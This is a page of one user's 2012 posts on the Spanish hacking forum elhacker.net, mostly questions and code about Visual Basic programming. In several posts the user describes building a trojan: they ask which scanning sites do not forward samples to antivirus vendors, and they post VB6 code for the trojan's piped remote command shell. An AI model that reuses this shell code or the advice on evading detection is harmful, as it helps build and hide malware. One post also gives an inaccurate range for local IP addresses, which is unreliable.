elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14
121  Programación / Programación Visual Basic / Re: Duda con codigo efecto scroll en: 21 Mayo 2012, 19:11 pm
Bueno lo he revisado y lo he comentado creo que esta todo bien jejeje ;D si veis algo raro decirmelo o si alguien no lo entiende



Código
  1. Public Sub Comenzar_Scroll(Objeto_Scroll As PictureBox, Texto As String, Velocidad As Long, Color_Fuente As Long)
  2. Dim r_Height_Texto As Long
  3. Dim ObjetoRect As RECT
  4. Dim t_Vel As Long
  5. Dim Ret As Long
  6.  
  7. 'Aqui esta poniendo las propiedades pasa que se pueda
  8. With Objeto_Scroll  ' escibir en el picture o form
  9.    .ScaleMode = vbPixels   'modo pixel
  10.    .AutoRedraw = True  'para que se actualizae el pintado
  11.    .ForeColor = Color_Fuente 'color de fuente
  12.    .FontSize = 16  'Tamano de la letra
  13. End With
  14.  
  15.  
  16. 'Aqui lo que hace es una primera llamada a la api para comprobar
  17. ' que puede pintar el texto sobre el objeto dado
  18. Ret = DrawText(Objeto_Scroll.hdc, Texto, -1, ObjetoRect, &H400)
  19.  
  20. 'Si el retorno es 0 entonces no puede pintar correctamente el objeto
  21. 'Y por lo tanto sale
  22. If Ret = 0 Then MsgBox " Error ", vbCritical: Exit Sub
  23.  
  24.    With ObjetoRect
  25.  
  26.        'Configura la posición inicial del área donde dibujar el texto
  27.        .Top = Objeto_Scroll.ScaleHeight
  28.        .Left = 0
  29.        .Right = Objeto_Scroll.ScaleWidth
  30.         r_Height_Texto = .Bottom
  31.        .Bottom = .Bottom + Objeto_Scroll.ScaleHeight
  32.    End With
  33.  
  34. 'Esta variable si está en True detiene el scroll
  35. Finalizar = False
  36.  
  37.  
  38. 'Si no cambias el valor de variable sigue dibujando el texto
  39. 'infinitamente
  40. While Finalizar = False
  41.  
  42.    'Aqui hace una comprobacion de la velocidad
  43.    If (GetTickCount() - t_Vel) > Velocidad Then
  44.  
  45.        ' Borra el contenido ya pintado en el objeto
  46.        Objeto_Scroll.Cls
  47.  
  48.        ' Dibuja el texto
  49.        Call DrawText(Objeto_Scroll.hdc, Texto, -1, ObjetoRect, &H1 Or &H10)
  50.  
  51.        With ObjetoRect
  52.            'Cambia la proxima posicion donde se escribira el texto
  53.            .Top = .Top - 1
  54.            .Bottom = .Bottom - 1
  55.  
  56.            ' Si llegó arriba de todo comienza de nuevo el scroll reseteando los valores top y bottom
  57.            If .Top < -(r_Height_Texto) Then
  58.                .Top = Objeto_Scroll.ScaleHeight
  59.                .Bottom = r_Height_Texto + Objeto_Scroll.ScaleHeight
  60.            End If
  61.  
  62.        End With
  63.  
  64.        'Cambia la variable para futuras comprobaciones de velocidad
  65.        t_Vel = GetTickCount()
  66.  
  67.    End If
  68.  
  69.    DoEvents
  70. Wend
  71. End Sub


Salu2, Noele1995
122  Programación / Programación Visual Basic / Re: Saber si una IP es Local o Remota en: 15 Mayo 2012, 20:32 pm
hay varias formas de saberlo , la mas comun es cuando tu ruter no acepta conexiones o la otra es un rango establecido entre 172.26.0.1 y 192.169.1.1 que serian  la dirección IP local es la que corresponde a la red local de su casa u oficina .  :rolleyes: nota: si es una red muy pero muy grade cabe decir que el rango establecido en esa red es relativo al numero de ordenadores que poseais .

El rango de ip locales suelen ser estos pero no tiene porque, hay muchas redes que tienen cambiados estos rangos o tienen configuradas ips locales estaticas y de esta forma pueden estar fuera del rango y ser locales. Lo de la recepcion de conexiones del router si se podria mirar para hacerlo por ahi.

Salu2, Noele1995
123  Programación / Programación Visual Basic / Re: Imagen conforme a una IP en: 13 Mayo 2012, 21:51 pm
Lo vi y me interese  ;D ;D jejeje asique he hecho algo en base a codigos de LeandroA para quien le sirva ahi vá.

https://rapidshare.com/files/2759427725/BanderaSegunPais.rar
124  Seguridad Informática / Análisis y Diseño de Malware / Re: Duda paginas antivirus. en: 24 Abril 2012, 18:03 pm
Es un tema importante a saber lo de NVT. Y nolose exactamente pero el de indetectables no creo que envien ninguna muestra sobre todo porque es de una comunidad que ya se sabe que se fabrica malware y ademas es de pago, asique me parece probable que lo hagan.

PD: Creo que se deberia hacer un post adjuntado a los importantes con informacion sobre esto ya que por internet hay poca y mucha gente "quema" los programas y sources.
125  Seguridad Informática / Análisis y Diseño de Malware / Duda paginas antivirus. en: 22 Abril 2012, 12:58 pm
Estaba viendo la deteccion de mi troyano y pense en subirlo a una pagina escaneadora, pero despues de mirar algunas como VirusTotal o VirScan lei en sus politicas que le pasarian los informes a las compañias antivirus para que puedan introducir el virus en su base de datos. El problema esque estuve mirando alguna pagina mas en la que no encontre si les pasan los informes o no pero no me quiero arriesgar y por internet no encuentro informacion al respecto. Si alguien sabe que paginas no pasan los informes se lo agradeceria mucho.
126  Seguridad Informática / Análisis y Diseño de Malware / Re: [VB6] Consola de comandos en: 11 Abril 2012, 17:31 pm
Gracias por la ayuda aunque al final no la necesite, solo tuve que hacer algunas modificaciones en las declaraciones y funciono :D
127  Seguridad Informática / Análisis y Diseño de Malware / [VB6] Consola de comandos en: 8 Abril 2012, 20:59 pm
Bueno para mi troyano queria elaborar una buena shell remota con pipes, como no tenia mucha idea me puse a investigar y ayudandome de una shell que encontre purulando por la web he elaborado este codigo pero nose porque me da error, si alguien me puede ayudar se lo agradeceria. El error lo da la api CreateProcessA.

Código
  1. Public Function CMD(Comando As String) As String
  2. On Error GoTo Error_cmd
  3.  
  4. Dim hReadPipe       As Long
  5. Dim hWritePipe      As Long
  6. Dim SecAtt          As SECURITY_ATTRIBUTES
  7. Dim ProcInfo        As PROCESS_INFORMATION
  8. Dim StUpInfo        As STARTUPINFO
  9. Dim Ret             As Long
  10. Dim Buffer          As String * 256
  11. Dim BytesRead       As Long
  12.  
  13.  
  14. SecAtt.nLength = Len(SecAtt)
  15. SecAtt.bInheritHandle = 1&
  16. SecAtt.lpSecurityDescriptor = 0&
  17.  
  18. If CreatePipe(hReadPipe, hWritePipe, SecAtt, 0) = 0 Then
  19.    CMD = "Error: " & Err.LastDllError
  20.    Exit Function
  21. End If
  22.  
  23. StUpInfo.cb = Len(StUpInfo)
  24. StUpInfo.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
  25. StUpInfo.hStdOutput = hWritePipe
  26. StUpInfo.hStdError = hWritePipe
  27. Comando = Environ("COMSPEC") & " /c " & Comando
  28.  
  29. If CreateProcessA(vbNullString, Comando, SecAtt, SecAtt, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, StUpInfo, ProcInfo) = 0 Then
  30.    CMD = "Error: " & Err.LastDllError
  31.    Exit Function
  32. End If
  33.  
  34. CloseHandle (hWritePipe)
  35. CMD = ""
  36.  
  37. Do
  38.    Ret = ReadFile(hReadPipe, Buffer, 256, BytesRead, 0&)
  39.    CMD = CMD & Left$(Buffer, BytesRead)
  40. Loop While Ret <> 0
  41.  
  42. CloseHandle (ProcInfo.hThread)
  43. CloseHandle (ProcInfo.hProcess)
  44. CloseHandle (hWritePipe)
  45. Exit Function
  46.  
  47. Error_cmd:
  48. CMD = "Error: " & Err.Description
  49. End Function
128  Programación / Programación Visual Basic / Imagen en un Listview en: 4 Abril 2012, 23:57 pm
Buenas de nuevo, me ha surgido una duda mientras estaba con un proyecto, es posible poner una imagen en un subitem de un listview? he buscado sobre ello pero no encuentro nada, si alguien a conseguido hacer esto le agradeceria su ayuda, y si no se puede tambien me gustaria saberlo para no comerme mas el coco xD

salu2!      Noele
129  Programación / Programación Visual Basic / Re: Modulo transferencias de archivos con winsock en: 24 Marzo 2012, 09:55 am
Ya tenia pensado modificarlo porque no me va a funcionar en mi proyecto ya que es multiconexion asique habia pensado ya ponerlo como parametro de las funciones, jeje esque lo hice rapido y no me di cuenta, luego lo cambio.
130  Programación / Programación Visual Basic / Modulo transferencias de archivos con winsock en: 24 Marzo 2012, 00:25 am
Hola pues hace unos dias hice un modulo para un proyecto en el que precisaba de el envio de archivos, y lo queria compartir para que la gente lo viese, se que esta muy hablada la transferencia de archivos, pero lo queria subir porque este modulo tambien da un ejemplo de la transferencia de carpetas, que cuando en su momento busque informacion acerca de esto apenas salio algun resultado, asique aqui lo dejo, ante cualquier fallo porfavor decirmelo!!

http://www.mediafire.com/?2045303add0r438

Salu2, Noele1995
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines